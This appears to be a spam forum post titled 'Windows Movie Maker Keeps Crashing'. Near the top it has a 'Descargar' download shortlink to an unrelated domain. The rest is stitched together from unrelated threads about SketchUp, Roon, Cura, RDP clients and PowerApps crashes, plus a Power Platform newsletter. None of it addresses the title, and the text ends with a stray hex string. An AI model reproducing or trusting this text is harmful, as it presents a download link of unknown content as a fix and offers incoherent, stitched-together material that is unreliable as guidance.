Re: Windows Movie Maker Keeps Crashing

0 views
Skip to first unread message
Message has been deleted

Ania Cozzolino

unread,
Jul 11, 2024, 5:25:53 PM7/11/24
to raraphodough

Sketchup make has just started crashing on my windows 10 machine after running well for months. Any advice? My windows 10 machine does automatic windows updates. Is there an issue with a recent update?

windows movie maker keeps crashing


Descargar https://ckonti.com/2yPCVy



Have you installed any new extensions recently, or updated any? You might try disabling all extensions via the Extension Manager window, shut down and restart SketchUp, and see if the spontaneous crashes continue.

Thanks Updating the graphics card driver seems to have prevented an immediate crash when opening the 2022 trial version. (I use open cut list - which is now running fine with 2017. I have not installed it for 2022.)

I am also having this problem and am using the most recent NVIDIA drivers for my graphics card. This was never a problem until the last week or a bit more. Windows Event Viewer has logged an event each time a crash occurred, with the error reported in clr.dll or System.Core.ni.dll in every case as below:

For me it appears that build 933 may have fixed things. Have had no trouble with Roon crashing/hanging when it has been minimized or in the background since that version installed. Keeping fingers crossed!

Roon Core is intermittently crashing on Windows 11 PC. Crashes appear to be caused by either switching from another application to Roon on the W11 PC or by waking the PC from sleep, either from a WOL command or from a connected USB device (mouse, keyboard). This is not happening consistently.

My library is a lot larger than yours (I think roon loads the entire library into memory) so your issues may be different but roon really uses a lot of memory. There are also reports of a memory leak on other threads. What you can do is open windows task manager to monitor memory usage before and during your crashes. What I found was that Windows would tolerate memory usage spikes up to about 93% to 95% before crashing roon. These spikes were occurring when switching between roon tasks just as you describe. I have upgraded to 32GB and roon is now much more stable.

Two weeks ago i had no porblems with Cura. Then suddently it crashed every time on startup. I tried (as mentioned) nearly everything to fix it. After i downgraded the nvidia driver, deleted the newest windows updates AND installed them all again, cura didn't crash (and i sliced some models) until i restarted my pc. Now it crashed every time again.

I have done some troubleshooting because I was also using the Creality Slicer. I thought it was a Win 11 issue. I have narrowed it down to Cura not working if my default monitor is a Displayport monitor. As long as my default is HDMI and the program starts on an HDMI connection I have no issues.

I recently updated my cura software to 5.1.1 latest. When I start it , it goes through the usual bed leveling and then stops at the top and never moves. I switched back to 5.0 and everything works fine. not sure what the problem is with the new update.

It sounds like something specific to cura and your printer. What kind of printer do you have? Maybe someone else has a similar problem. I guess I would look at the gcodes of the bad gcode file to see what they are telling the printer to do and compare that to a gcode file that works. The problem is most likely in the first 20 or so gcodes.

I have an Ender 3 pro with direct drive. The new version just seems to stop when it gets ready to print. It goes through the initial beginning, like checking bed leveling. Once its done with that it goes into the position like its getting ready to start , but just stops. I switched back to previous version and it works fine.

I was able to solve this problem by running as administrator

every time I would open the app it would just be a white screen and say not responding, once I ran as administrator it fixed the issue

I believe Cura tries to access all your COM ports and network drives and also searches your LAN for ultimaker printers. Until it had admin access it probably couldn't get to one of those things and unfortunately locked up. Or perhaps you installed it as an admin and it couldn't update it's own config files? Just some guesses. I don't run it in admin mode.

FWIW in Linux I can't even get it to run if I try running it as a superuser. But in Windows you probably shouldn't have to run as admin because it's not trying to change anything in the system, just use it.

Every remote connection using RDP (working without issues before) immediatly crashes silently after showing the RDP window for less than a second. starting KDRC or Remmina from the console doesn't produce any error message just terminates the application without notice.

This is on arch latest, using proprietary nvidia graphics, fully updated. I access the remote network with openVPN.
If I start a virtual box running windows 10 i can connect from the virtual windows desktop to all these machines using the win10 builtin remote desktop client.

It doesn't seem to get triggered by xorg or kwin crashes, also crashing Gtk applications seem not to get noticed by kcrash either. Now, KRDC obviously is a KDE application but it still doesn't trigger the crash dialog. Remmina does neither.

Since there is another built in intel i5 4690 graphics chip, would it be possible to run another X-session with another user account on a secondary monitor without using libva-vdpau-driver on the secondary graphics output?

Though I have to postpone for the moment and work from a virtual system to connect via RDP for the moment as I am right now stuck in the end-of-year crunch... but I will come back to this when time allows...

I have an app ( ddd7fecf-c99d-47c3-a2c6-3c96fe427db3 ) that is mostly built off of an on-prem SQL gateway and uses galleries, dropdowns and checkboxes. I have users scattered around our city that use either iPhone 7 or iPad Air to run this app and they will report "crashes". Some of these crashes are true crashes which close the PowerApps application and some restart the app back to it's homescreen. Aside from a persistent issue where scrolling through a large gallery very quickly will cause a crash, there doesn't seem to be any rhyme or reason for the crashes.

1. can you check if Enhanced SaveData and LoadData option is enabled under App Setting -> Advanced Settings? That should ease memory consumption a bit and reduce memory-related crashes.

2. can you check if your apps loads a lot of screen at start? You can check that by clicking into App or any Screen in Tree view (please see my attached screenshot), and on the pannel on the right you can see those onStart, onVisible and onHidden Action. It's suggested that you only load the data you need and do clean up when leaving a Screen to the next.

Thank you very much again for providing the Session IDs. We are currently working on optimizing memory issue and still don't have a clear ETA for the next improvement. We are sorry about any trouble this memory issue caused.

Hi @BegeNCSU,
I'm sorry to hear that your users are experiencing crashes while using PowerApps. Generally, the behavior you're describing occurs due to memory limitations on the device. This is almost definitely what causes the consistent crashing when scrolling rapidly through a large gallery.

Unfortunately, I can't find any relevant information using the AppID you've provide. In situations like this, it's usually more helpful to get a SessionID from the impacted user. You can follow the instructions here in order to get a SessionID: -us/powerapps/maker/canvas-apps/get-sessionid#when-running-an-app-on-a-...

In the meantime, I've reached out to some other folks on the PowerApps team about possible ways to optimize the memory usage of your app more generally. I'll be sure to let you know what I hear back from them.

We should be good with the Session IDs you've provided. I've passed them all along to some folks who are investigating your issue. I've asked them to update this thread with more information once they've found it.

Meanwhile, if your app doesn't have "Control Property Optimization" turned on, you could try turning that on. That option can reduce memory consumption. You can find that option under "File -> App settings -> Advanced settings".

Some of the others have also reported that without scrolling, the app will crash back to either restart the app I made, go back to the app selection screen within PowerApps or quit PowerApps entirely. Were any of the sessions IDs I provided help provide clues for those situations?

It's time for the June Community Newsletter, where we highlight the latest news, product releases, upcoming events, and the amazing work of our outstanding Community members. If you're new to the Community, please make sure to follow the latest News & Announcements and check out the Community on LinkedIn as well! It's the best way to stay up-to-date with all the news from across Microsoft Power Platform and beyond. COMMUNITY HIGHLIGHTS Check out the most active community members of the last month! These hardworking members are posting regularly, answering questions, kudos, and providing top solutions in their communities. We are so thankful for each of you--keep up the great work! If you hope to see your name here next month, follow these awesome community members to see what they do! Power AppsPower AutomateCopilot StudioPower PagesWarrenBelzcreativeopinionExpiscornovusFubarAmikNived_NambiarPstork1OliverRodriguesmmbr1606ManishSolankifernandosilvaragavanrajanBCBuizerExpiscornovusrenatoromaoLucas001timlAlexEncodianViswavEmadBeshaiDBO_DVDeenujiUmiantaChrist0fGochixVishnuReddy1997citron-trucmandelaVishalJhaverieetuRoboJohanTprathyooanandm08VictorIvanidzenicoxrfm1964shashankbhidepaulbeck1 rpaa LATEST NEWSSummer of Solutions 2024The Summer of Solutions challenge kicked off this month - an amazing Microsoft Community initiative to win free tickets to the Power Platform Community Conferencethis September in Las Vegas.The challenge is NOW OPEN to all #PowerPlatform community members and will consist of four weekly entry periods until July 14th, 2024. Click the image below to find out more on how you can win free tickets to #PPCC24 by entering the Summer of Solutions TODAY! Microsoft Customer StoriesWe're constantly working with an array of great businesses across the globe to assist them in taking advantage of the latest business applications technology.If you'd like to find out more about their low code journeys, click the image below to view our playlist of Customer Stories to discover how Accenture, Lumen Technologies, Cineplex, and many more, are streamlining their business processes with Microsoft Power Platform. Microsoft Leap ProgramHave you heard of Microsoft Leap - a global program designed to recruit, develop, and upskill unconventional talent for careers in the tech space.Microsoft Leap organizes a number of pathways into the industry, including the recent "NFL Legend Cohort - Technical Program Management" run jointly with the NFL Player Care Foundation (PCF) who are dedicated to helping retired players improve their quality of life.Click the image below to find out more about the great day shared at the Redmond campus and be sure to visit the Microsoft Leap website to discover how this amazing initiative is helping re-launch the lives of countless individuals.www.leap.microsoft.com UPCOMING EVENTSBiz Apps Partner Summit Seattle July 24-25It's not long now until the Biz Apps Partner Summit, which takes place at the Hilton Bellevue in Seattle on July 24-25, 2024.This event is the perfect place to network, connect, and learn how to scale your Microsoft practice, drive profitable revenue, and dazzle your customers! There's a great selection of speakers, including the likes of Tom Patterson, Donald Kossmann Joseph Corigliano, Cecilia Flombaum, Peter Jensen, John Siefert, Becky Lymberis, Daniel Rippey, and many more.Click the image below to find out more and register today! TechCon365 & Power Platform Conference D.C. August 12-16Things are hotting up for the next TechCon365 & PWRCON Conference in Washington D.C. on August 12-16, 2024.Featuring the likes of Tamara Bredemus, Sunny Eltepu, Lindsay Shelton, Brian Alderman, Daniel Glenn, Julie Turner, Jim Novak, John White, Jason Himmelstein, Luc Labelle, Emily Mancini, MVP, UXMC, Fabian Williams, Emma Wiehe,and many more, this is the perfect event for those that are looking to gain invaluable insights from industry experts.Click the image below to grab your tickets today! Power Platform Community Conference Vegas Sept. 18-20thAre you ready to come and join the fun in Las Vegas this September at PPCC24?This event is the perfect place to connect with fellow business applications enthusiasts and share your knowledge with the worldwide Microsoft Community.Now's your chance to hold all the aces. Just click the image below to find out more and we hope to see you go ALL-IN this September in Las Vegas! For more events, click the image below to visit the Community Days website.

d3342ee215
Reply all
Reply to author
Forward
0 new messages